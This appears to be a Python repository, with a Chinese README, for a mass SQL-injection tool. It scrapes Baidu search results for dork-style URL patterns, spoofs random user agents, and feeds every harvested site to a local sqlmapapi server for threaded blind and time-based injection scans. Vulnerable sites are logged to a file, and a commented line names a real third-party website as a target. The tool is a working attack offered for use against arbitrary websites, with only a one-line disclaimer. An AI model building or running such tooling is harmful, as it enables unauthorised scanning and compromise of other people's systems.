├── search
├── __init__.py
└── baidu.py
├── keyword.txt
├── data
└── injection.txt
├── .gitignore
├── config.py
├── README.md
├── set_option.txt
└── AutoSqli.py
/search/__init__.py:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/keyword.txt:
--------------------------------------------------------------------------------
1 | site:.hk inurl:.php?
--------------------------------------------------------------------------------
/data/injection.txt:
--------------------------------------------------------------------------------
1 | http://www.example.com
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | *.pyc
2 | .DS_Store
3 | *.log
4 | data/*.*
--------------------------------------------------------------------------------
/config.py:
--------------------------------------------------------------------------------
1 | #!/bin/env python
2 | # -*- coding=utf-8 -*-
3 | import logging
4 |
5 | API_URL = "http://127.0.0.1:8775"
6 |
7 | LEVELS = {'debug': logging.DEBUG,
8 | 'info': logging.INFO,
9 | 'warning': logging.WARNING,
10 | 'error': logging.ERROR,
11 | 'critical': logging.CRITICAL}
12 |
13 | LOG = {
14 | "level" : LEVELS["debug"],
15 | "filename" : "autosqli.log",
16 | "format" : '[%(asctime)s] %(levelname)-8s %(name)-12s %(message)s',
17 | "datefmt" : '%Y-%m-%d %H:%M:%S'
18 | }
19 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | ## sqlmapapi_pi 批量注入工具
2 | ------------
3 | **Intorduction:**
4 |
5 | - 本程序是基于[manning23](https://github.com/manning23)的项目二次开发,参考地址 [click me](http://drops.wooyun.org/tips/6653)
6 | - 本程序利用百度爬取特定的url链接,然后调用sqlmapapi(sqlmap自带的批量接口),进行注入的判断。
7 | - AutoSqli.py中option的设置可参考set_option.txt;可自定义判断注入的方法,例如,基于时间/布尔等。
8 |
9 | **Useage:**
10 | - 在sqlmap的目录下执行`python sqlmapapi.py -s`进行监听操作。
11 | - 运行AutoSqli.py `python AutoSqli.py` 参数可通过`-h`查看
12 |
13 | **Tips:**
14 | * 这里要注意的是在代码里自定义搜索关键字:`key='inurl:asp?id='`
15 | * 以及线程数:`nloops = range(4) #threads Num`
16 | * 建议线程数不要太多,以免卡死。
17 | * 请勿利用工具做违法犯罪的事情。
18 |
--------------------------------------------------------------------------------
/search/baidu.py:
--------------------------------------------------------------------------------
1 | #coding: utf-8
2 | from __future__ import unicode_literals
3 |
4 | import urllib2
5 | import string
6 | import urllib
7 | import re
8 | import random
9 | import logging
10 |
11 | __all__ = ["geturl"]
12 |
13 | USER_AGENTS = ['Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20130406 Firefox/23.0', \
14 | 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0', \
15 | 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533+ \
16 | (KHTML, like Gecko) Element Browser 5.0', \
17 | 'IBM WebExplorer /v0.94', 'Galaxy/1.0 [en] (Mac OS X 10.5.6; U; en)', \
18 | 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)', \
19 | 'Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14', \
20 | 'Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) \
21 | Version/6.0 Mobile/10A5355d Safari/8536.25', \
22 | 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) \
23 | Chrome/28.0.1468.0 Safari/537.36', \
24 | 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; TheWorld)']
25 |
26 | logger = logging.getLogger('app.baidu')
27 |
28 | def baidu_search(keyword, pn):
29 | p = {'wd': keyword}
30 | res = urllib2.urlopen(("http://www.baidu.com/s?"+urllib.urlencode(p)+"&pn={0}&cl=3&rn=10").format(pn)) #rn为每页的显示数目 pn表示当前显示的是第pn条搜索结果
31 | html = res.read()
32 | return html
33 |
34 | def getList(regex, text): #将获取的url去重并存入list
35 | arr = []
36 | res = re.findall(regex, text)
37 | if res:
38 | for r in res:
39 | arr.append(r)
40 | return arr
41 |
42 | def getMatch(regex, text): #匹配函数
43 | res = re.findall(regex, text)
44 | if res:
45 | return res[0]
46 | return ''
47 |
48 | def is_get(url): #是否是sqlmap可识别的get型链接
49 | regex = r'(\S*?)\?.*=.*'
50 | res = re.match(regex,url)
51 | if res:
52 | #print res.group(1)
53 | return res.group(1)
54 | else:
55 | return 0
56 | # def Deduplication():
57 | # regex=r'\S'
58 |
59 | def geturl(keyword, pages): #获取url
60 | targets = []
61 | hosts = []
62 | for page in range(0,int(pages)):
63 | pn = (page+1)*10
64 | html = baidu_search(keyword, pn)
65 | content = unicode(html, 'utf-8','ignore')
66 | arrList = getList(u"
(.*)
", content) #分割页面块
67 | #print arrList
68 | # f2=open('content.txt','a')
69 | # f2.write(str(arrList)+'\n')#调试使用,获取内容
70 | # f2.close()
71 | for item in arrList:
72 | regex = u"data-tools='\{\"title\":\"(.*)\",\"url\":\"(.*)\"\}'"
73 | link = getMatch(regex,item)
74 | url = link[1] #获取百度改写url
75 | try:
76 | domain = urllib2.Request(url)
77 | r = random.randint(0, len(USER_AGENTS))
78 | domain.add_header('User-agent', USER_AGENTS[r])
79 | domain.add_header('connection', 'keep-alive')
80 | response = urllib2.urlopen(domain)
81 | uri = response.geturl() #获取真实url
82 | urs = is_get(uri) #是否是传统的get型
83 | if (uri in targets) or (urs in hosts) :
84 | continue
85 | else:
86 | targets.append(uri)
87 | hosts.append(urs)
88 | f1 = open('data/targets.txt','a') #存放url链接
89 | f1.write(uri+'\n')
90 | f1.close()
91 | except:
92 | continue
93 | logger.info("urls have been grabed already!!!")
94 | return targets
95 |
96 | if __name__ == '__main__':
97 | pass
98 |
99 |
--------------------------------------------------------------------------------
/set_option.txt:
--------------------------------------------------------------------------------
1 | {
2 | "options": {
3 | "crawlDepth": null,
4 | "osShell": false,
5 | "getUsers": false,
6 | "getPasswordHashes": false,
7 | "excludeSysDbs": false,
8 | "uChar": null,
9 | "regData": null,
10 | "cpuThrottle": 5,
11 | "prefix": null,
12 | "code": null,
13 | "googlePage": 1,
14 | "query": null,
15 | "randomAgent": false,
16 | "delay": 0,
17 | "isDba": false,
18 | "requestFile": null,
19 | "predictOutput": false,
20 | "wizard": false,
21 | "stopFail": false,
22 | "forms": false,
23 | "taskid": "73674cc5eace4ac7",
24 | "skip": null,
25 | "dropSetCookie": false,
26 | "smart": false,
27 | "risk": 1,
28 | "sqlFile": null,
29 | "rParam": null,
30 | "getCurrentUser": false,
31 | "notString": null,
32 | "getRoles": false,
33 | "getPrivileges": false,
34 | "testParameter": null,
35 | "tbl": null,
36 | "charset": null,
37 | "trafficFile": null,
38 | "osSmb": false,
39 | "level": 1,
40 | "secondOrder": null,
41 | "pCred": null,
42 | "timeout": 30,
43 | "firstChar": null,
44 | "updateAll": false,
45 | "binaryFields": false,
46 | "checkTor": false,
47 | "aType": null,
48 | "direct": null,
49 | "saFreq": 0,
50 | "tmpPath": null,
51 | "titles": false,
52 | "getSchema": false,
53 | "identifyWaf": false,
54 | "checkWaf": false,
55 | "regKey": null,
56 | "limitStart": null,
57 | "loadCookies": null,
58 | "dnsName": null,
59 | "csvDel": ",",
60 | "oDir": null,
61 | "osBof": false,
62 | "invalidLogical": false,
63 | "getCurrentDb": false,
64 | "hexConvert": false,
65 | "answers": null,
66 | "host": null,
67 | "dependencies": false,
68 | "cookie": null,
69 | "proxy": null,
70 | "regType": null,
71 | "optimize": false,
72 | "limitStop": null,
73 | "mnemonics": null,
74 | "uFrom": null,
75 | "noCast": false,
76 | "testFilter": null,
77 | "eta": false,
78 | "threads": 1,
79 | "logFile": null,
80 | "os": null,
81 | "col": null,
82 | "rFile": null,
83 | "verbose": 1,
84 | "aCert": null,
85 | "torPort": null,
86 | "privEsc": false,
87 | "forceDns": false,
88 | "getAll": false,
89 | "api": true,
90 | "url": null,
91 | "invalidBignum": false,
92 | "regexp": null,
93 | "getDbs": false,
94 | "freshQueries": false,
95 | "uCols": null,
96 | "smokeTest": false,
97 | "pDel": null,
98 | "wFile": null,
99 | "udfInject": false,
100 | "tor": false,
101 | "forceSSL": false,
102 | "beep": false,
103 | "saveCmdline": false,
104 | "configFile": null,
105 | "scope": null,
106 | "dumpAll": false,
107 | "torType": "HTTP",
108 | "regVal": null,
109 | "dummy": false,
110 | "commonTables": false,
111 | "search": false,
112 | "skipUrlEncode": false,
113 | "referer": null,
114 | "liveTest": false,
115 | "purgeOutput": false,
116 | "retries": 3,
117 | "extensiveFp": false,
118 | "dumpTable": false,
119 | "database": "/tmp/sqlmapipc-EmjjlQ",
120 | "batch": true,
121 | "headers": null,
122 | "flushSession": false,
123 | "osCmd": null,
124 | "suffix": null,
125 | "dbmsCred": null,
126 | "regDel": false,
127 | "shLib": null,
128 | "nullConnection": false,
129 | "timeSec": 5,
130 | "msfPath": null,
131 | "noEscape": false,
132 | "getHostname": false,
133 | "sessionFile": null,
134 | "disableColoring": true,
135 | "getTables": false,
136 | "agent": null,
137 | "lastChar": null,
138 | "string": null,
139 | "dbms": null,
140 | "tamper": null,
141 | "hpp": false,
142 | "runCase": null,
143 | "osPwn": false,
144 | "evalCode": null,
145 | "cleanup": false,
146 | "getBanner": false,
147 | "profile": false,
148 | "regRead": false,
149 | "bulkFile": null,
150 | "safUrl": null,
151 | "db": null,
152 | "dumpFormat": "CSV",
153 | "alert": null,
154 | "user": null,
155 | "parseErrors": false,
156 | "aCred": null,
157 | "getCount": false,
158 | "dFile": null,
159 | "data": null,
160 | "regAdd": false,
161 | "ignoreProxy": false,
162 | "getColumns": false,
163 | "mobile": false,
164 | "googleDork": null,
165 | "sqlShell": false,
166 | "pageRank": false,
167 | "tech": "BEUSTQ",
168 | "textOnly": false,
169 | "commonColumns": false,
170 | "keepAlive": false
171 | }
172 | }
173 |
--------------------------------------------------------------------------------
/AutoSqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | #-*-coding:utf-8-*-
3 | from __future__ import absolute_import, print_function
4 |
5 | import requests
6 | import time
7 | import json
8 | import threading
9 | import Queue
10 | from search import baidu
11 | import logging
12 | from config import LOG, API_URL
13 |
14 |
15 | class AutoSqli(object):
16 | """
17 | 使用sqlmapapi的方法进行与sqlmapapi建立的server进行交互
18 |
19 | """
20 | def __init__(self, server='', target='',data = '',referer = '',cookie = ''):
21 | super(AutoSqli, self).__init__()
22 | self.server = server
23 | if self.server[-1] != '/':
24 | self.server = self.server + '/'
25 | self.target = target
26 | self.taskid = ''
27 | self.engineid = ''
28 | self.status = ''
29 | self.data = data
30 | self.referer = referer
31 | self.cookie = cookie
32 | self.start_time = time.time()
33 | self.logger = logging.getLogger('app.run')
34 | self.logger.info('Creating an instance of AutoSqli for {0}.'.format(self.target))
35 |
36 | def task_new(self):
37 | try:
38 | self.taskid = json.loads(
39 | requests.get(self.server + 'task/new').text)['taskid']
40 | #print 'Created new task: ' + self.taskid
41 | if len(self.taskid) > 0:
42 | return True
43 | return False
44 | except ConnectionError:
45 | self.logging.error("sqlmapapi.py is not running")
46 |
47 | def task_delete(self):
48 | json_kill = requests.get(self.server + 'task/' + self.taskid + '/delete').text
49 | # if json.loads(requests.get(self.server + 'task/' + self.taskid + '/delete').text)['success']:
50 | # #print '[%s] Deleted task' % (self.taskid)
51 | # return True
52 | # return False
53 |
54 | def scan_start(self):
55 | headers = {'Content-Type': 'application/json'}
56 | self.logger.debug("Starting to scan "+ self.target +"..................")
57 | payload = {'url': self.target}
58 | url = self.server + 'scan/' + self.taskid + '/start'
59 | t = json.loads(
60 | requests.post(url, data=json.dumps(payload), headers=headers).text)
61 | self.engineid = t['engineid']
62 | if len(str(self.engineid)) > 0 and t['success']:
63 | #print 'Started scan'
64 | return True
65 | return False
66 |
67 | def scan_status(self):
68 | self.status = json.loads(
69 | requests.get(self.server + 'scan/' + self.taskid + '/status').text)['status']
70 | if self.status == 'running':
71 | return 'running'
72 | elif self.status == 'terminated':
73 | return 'terminated'
74 | else:
75 | return 'error'
76 |
77 | def scan_data(self):
78 | self.data = json.loads(
79 | requests.get(self.server + 'scan/' + self.taskid + '/data').text)['data']
80 | if len(self.data) == 0:
81 | #print 'not injection\t'
82 | pass
83 | else:
84 | f = open('data/injection.txt','a')
85 | f.write(self.target+'\n')
86 | f.close()
87 | self.logger.warning('injection \t')
88 |
89 | def option_set(self):
90 | headers = {'Content-Type': 'application/json'}
91 | option = {"options": {
92 | "randomAgent": True,
93 | "tech":"BT"
94 | }
95 | }
96 | url = self.server + 'option/' + self.taskid + '/set'
97 | t = json.loads(
98 | requests.post(url, data=json.dumps(option), headers=headers).text)
99 | #print t
100 |
101 | def scan_stop(self):
102 | json_stop=requests.get(self.server + 'scan/' + self.taskid + '/stop').text
103 | # json.loads(
104 | # requests.get(self.server + 'scan/' + self.taskid + '/stop').text)['success']
105 |
106 | def scan_kill(self):
107 | json_kill=requests.get(self.server + 'scan/' + self.taskid + '/kill').text
108 | # json.loads(
109 | # requests.get(self.server + 'scan/' + self.taskid + '/kill').text)['success']
110 |
111 | def run(self):
112 | if not self.task_new():
113 | return False
114 | self.option_set()
115 | if not self.scan_start():
116 | return False
117 | while True:
118 | if self.scan_status() == 'running':
119 | time.sleep(10)
120 | elif self.scan_status() == 'terminated':
121 | break
122 | else:
123 | break
124 | #print time.time() - self.start_time
125 | if time.time() - self.start_time > 500:
126 | error = True
127 | self.scan_stop()
128 | self.scan_kill()
129 | break
130 | self.scan_data()
131 | self.task_delete()
132 | #print time.time() - self.start_time
133 |
134 | class myThread(threading.Thread):
135 | def __init__(self,q,thread_id):
136 | threading.Thread.__init__(self)
137 | self.q=q
138 | self.thread_id=thread_id
139 | def run(self):
140 | while not self.q.empty():
141 | #print "threading "+str(self.thread_id)+" is running"
142 | objects=self.q.get()
143 | result=objects.run()
144 |
145 | def main():
146 | import argparse
147 | parser = argparse.ArgumentParser()
148 | parser.add_argument('-n', '--num', default=4, nargs='?', type=int, dest='num', help="Thread num")
149 | parser.add_argument('-p', '--page', default=3, nargs='?', type=int, dest='page', help="Search Page num")
150 | parser.add_argument('-d', '--log', default=LOG["filename"], nargs='?', type=str, dest='log', help="The path of debug log")
151 | args = parser.parse_args()
152 | logger = logging.getLogger('app')
153 | logger.setLevel(LOG["level"])
154 | fh = logging.FileHandler(args.log)
155 | fh.setLevel(LOG["level"])
156 | formatter = logging.Formatter(LOG['format'], LOG["datefmt"])
157 | fh.setFormatter(formatter)
158 | sh = logging.StreamHandler()
159 | sh.setLevel(LOG["level"])
160 | sh.setFormatter(formatter)
161 | logger.addHandler(fh)
162 | logger.addHandler(sh)
163 | urls = []
164 | logger.info('the program starts!')
165 | pages = args.page
166 | key = 'inurl:asp?id='
167 | urls = baidu.geturl(key, pages)
168 | #print urls
169 | workQueue = Queue.Queue()
170 | for tar in urls:
171 | s = AutoSqli(API_URL, tar)
172 | workQueue.put(s)
173 | threads = []
174 | nloops = range(args.num) #threads Num
175 | for i in nloops:
176 | t = myThread(workQueue, i)
177 | t.start()
178 | threads.append(t)
179 | for i in nloops:
180 | threads[i].join()
181 | logger.info("Exiting Main Thread")
182 |
183 | if __name__ == '__main__':
184 | main()
185 |
186 |
187 |
188 |
189 | # t = AutoSqli('http://127.0.0.1:8775', 'http://www.changan-mazda.com.cn/market/runningmen/article.php?id=191')
190 | # t.run()
191 |
--------------------------------------------------------------------------------